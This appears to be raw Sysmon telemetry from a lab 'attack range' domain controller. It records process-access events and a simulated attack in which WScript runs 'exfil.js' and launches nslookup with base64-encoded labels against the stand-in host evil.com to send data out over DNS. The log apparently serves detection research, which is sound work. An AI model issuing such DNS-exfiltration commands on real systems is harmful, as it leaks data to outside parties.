84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217642Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217641Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217640Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1D47-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217639Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.844{2E1864BB-18E0-629A-6742-000000005F02}39766248C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-1D47-000000005F02}5860C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217638Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.850{2E1864BB-1905-629A-1D47-000000005F02}5860C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbcl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.828{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwkyxr.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.812{2E1864BB-1905-629A-1B47-000000005F02}42041292C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1C47-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.812{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.811{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.811{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1C47-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.810{2E1864BB-1905-629A-1A47-000000005F02}81043732C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1C47-000000005F02}1044C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.810{2E1864BB-1905-629A-1C47-000000005F02}1044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-1A47-000000005F02}8104C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwkyxr.tmp 2>&1 10341000x8000000000000000217628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.775{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1B47-000000005F02}4204C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.775{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1B47-000000005F02}4204C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.775{2E1864BB-1905-629A-1B47-000000005F02}42041292C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1A47-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1B47-000000005F02}4204C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1A47-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.759{2E1864BB-18E0-629A-6742-000000005F02}39765252C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-1A47-000000005F02}8104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.760{2E1864BB-1905-629A-1A47-000000005F02}8104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzwkyxr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.744{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhx.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-1905-629A-1847-000000005F02}48125688C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1947-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.712{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 